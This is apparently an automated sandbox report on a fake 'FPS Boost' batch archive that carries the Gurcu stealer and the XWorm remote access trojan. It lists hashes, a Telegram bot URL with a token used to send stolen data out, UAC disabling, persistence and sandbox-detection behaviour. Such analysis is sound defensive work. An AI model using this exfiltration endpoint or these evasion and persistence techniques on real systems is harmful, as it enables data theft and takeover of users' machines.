gurcu | 51bd7eb315dace468e4b936601f8ff6d3936f6935a4cefd0402e59802bbfa855

Analysis

max time kernel
123s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-10-2024 07:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FPS_Boost_1_bat.zip
Size

4KB
MD5

e1758b6bc7aac65efd538264595fb1cb
SHA1

a3bd62259c9d3fe9ef148e9cc728ca6cd662779e
SHA256

51bd7eb315dace468e4b936601f8ff6d3936f6935a4cefd0402e59802bbfa855
SHA512

ec3eef846f4144e11f8a6c09426356cdc4d77950757724003ea1ee1bcd63ee86348462f6d31568008d44d01cbd9333aa61f33260a71a4c3a3c4fcef0fbd634a1
SSDEEP

96:tSmQTWstt675g83x8U9B7fwwFN0XiGPPrs+ZzNq:tJ2ttSg83xxswv8rsIE

Score

10^/10

gurcu xworm evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

3.1

Mutex

nng2v8kVdszgIcVx

Attributes

Install_directory
%Port%
install_file
USB.exe

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7278641970:AAEHOVYteJH3T-Bg5zEPMUSj6sdFforQUZw/sendMessag

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4356-57-0x00000215F5E40000-0x00000215F5E50000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
39	4440	powershell.exe
42	4356	powershell.exe
45	4356	powershell.exe
47	4356	powershell.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2452	powershell.exe
400	powershell.exe
4084	powershell.exe
3348	powershell.exe
4392	powershell.exe
388	powershell.exe
532	powershell.exe
3700	powershell.exe
1632	powershell.exe
2976	powershell.exe
1924	powershell.exe
2716	powershell.exe
4440	powershell.exe
3668	powershell.exe
1992	powershell.exe
4376	powershell.exe
4320	powershell.exe
2908	powershell.exe
4032	powershell.exe
2820	powershell.exe
4740	powershell.exe
4356	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Drivers\etc\hosts	powershell.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	ip-api.com

Drops file in System32 directory 13 IoCs

description	ioc	Process
File created	C:\Windows\System32\ [	cmd.exe
File created	C:\Windows\System32\ Debloat	cmd.exe
File created	C:\Windows\System32\ [ X to go Back ]	cmd.exe
File created	C:\Windows\System32\ Version 2.0	cmd.exe
File created	C:\Windows\System32\ 1	cmd.exe
File created	C:\Windows\System32\ ]	cmd.exe
File created	C:\Windows\System32\ [	cmd.exe
File created	C:\Windows\System32\ 2	cmd.exe
File created	C:\Windows\System32\ 7	cmd.exe
File created	C:\Windows\System32\ _________________________________________________________________________________	cmd.exe
File created	C:\Windows\System32\ Cleaner	cmd.exe
File created	C:\Windows\System32\ Game Booster	cmd.exe
File created	C:\Windows\System32\ 3	cmd.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4188	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1476	taskkill.exe

Modifies registry class 24 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{D0D63A3D-E004-4E3D-A05E-3B5DE6FCC69A}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{2757D94A-4CD0-4999-849F-3A8973457A0F}	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4260	schtasks.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
4440	powershell.exe
4440	powershell.exe
4356	powershell.exe
4356	powershell.exe
388	powershell.exe
388	powershell.exe
4032	powershell.exe
4032	powershell.exe
532	powershell.exe
532	powershell.exe
3700	powershell.exe
3700	powershell.exe
4392	powershell.exe
4392	powershell.exe
2452	powershell.exe
2452	powershell.exe
1632	powershell.exe
1632	powershell.exe
1924	powershell.exe
1924	powershell.exe
2716	powershell.exe
2716	powershell.exe
4376	powershell.exe
4376	powershell.exe
4320	powershell.exe
4320	powershell.exe
1992	powershell.exe
1992	powershell.exe
400	powershell.exe
400	powershell.exe
4740	powershell.exe
4740	powershell.exe
2908	powershell.exe
2908	powershell.exe
4084	powershell.exe
4084	powershell.exe
3668	powershell.exe
3668	powershell.exe
3348	powershell.exe
3348	powershell.exe
2820	powershell.exe
2820	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1184	7zG.exe
Token: 35	1184	7zG.exe
Token: SeSecurityPrivilege	1184	7zG.exe
Token: SeSecurityPrivilege	1184	7zG.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeIncreaseQuotaPrivilege	4620	WMIC.exe
Token: SeSecurityPrivilege	4620	WMIC.exe
Token: SeTakeOwnershipPrivilege	4620	WMIC.exe
Token: SeLoadDriverPrivilege	4620	WMIC.exe
Token: SeSystemProfilePrivilege	4620	WMIC.exe
Token: SeSystemtimePrivilege	4620	WMIC.exe
Token: SeProfSingleProcessPrivilege	4620	WMIC.exe
Token: SeIncBasePriorityPrivilege	4620	WMIC.exe
Token: SeCreatePagefilePrivilege	4620	WMIC.exe
Token: SeBackupPrivilege	4620	WMIC.exe
Token: SeRestorePrivilege	4620	WMIC.exe
Token: SeShutdownPrivilege	4620	WMIC.exe
Token: SeDebugPrivilege	4620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4620	WMIC.exe
Token: SeRemoteShutdownPrivilege	4620	WMIC.exe
Token: SeUndockPrivilege	4620	WMIC.exe
Token: SeManageVolumePrivilege	4620	WMIC.exe
Token: 33	4620	WMIC.exe
Token: 34	4620	WMIC.exe
Token: 35	4620	WMIC.exe
Token: 36	4620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4620	WMIC.exe
Token: SeSecurityPrivilege	4620	WMIC.exe
Token: SeTakeOwnershipPrivilege	4620	WMIC.exe
Token: SeLoadDriverPrivilege	4620	WMIC.exe
Token: SeSystemProfilePrivilege	4620	WMIC.exe
Token: SeSystemtimePrivilege	4620	WMIC.exe
Token: SeProfSingleProcessPrivilege	4620	WMIC.exe
Token: SeIncBasePriorityPrivilege	4620	WMIC.exe
Token: SeCreatePagefilePrivilege	4620	WMIC.exe
Token: SeBackupPrivilege	4620	WMIC.exe
Token: SeRestorePrivilege	4620	WMIC.exe
Token: SeShutdownPrivilege	4620	WMIC.exe
Token: SeDebugPrivilege	4620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4620	WMIC.exe
Token: SeRemoteShutdownPrivilege	4620	WMIC.exe
Token: SeUndockPrivilege	4620	WMIC.exe
Token: SeManageVolumePrivilege	4620	WMIC.exe
Token: 33	4620	WMIC.exe
Token: 34	4620	WMIC.exe
Token: 35	4620	WMIC.exe
Token: 36	4620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1484	WMIC.exe
Token: SeSecurityPrivilege	1484	WMIC.exe
Token: SeTakeOwnershipPrivilege	1484	WMIC.exe
Token: SeLoadDriverPrivilege	1484	WMIC.exe
Token: SeSystemProfilePrivilege	1484	WMIC.exe
Token: SeSystemtimePrivilege	1484	WMIC.exe
Token: SeProfSingleProcessPrivilege	1484	WMIC.exe
Token: SeIncBasePriorityPrivilege	1484	WMIC.exe
Token: SeCreatePagefilePrivilege	1484	WMIC.exe
Token: SeBackupPrivilege	1484	WMIC.exe
Token: SeRestorePrivilege	1484	WMIC.exe
Token: SeShutdownPrivilege	1484	WMIC.exe
Token: SeDebugPrivilege	1484	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1484	WMIC.exe
Token: SeRemoteShutdownPrivilege	1484	WMIC.exe
Token: SeUndockPrivilege	1484	WMIC.exe

Suspicious use of FindShellTrayWindow 48 IoCs

pid	Process
1184	7zG.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
4728	explorer.exe
1788	explorer.exe
1788	explorer.exe
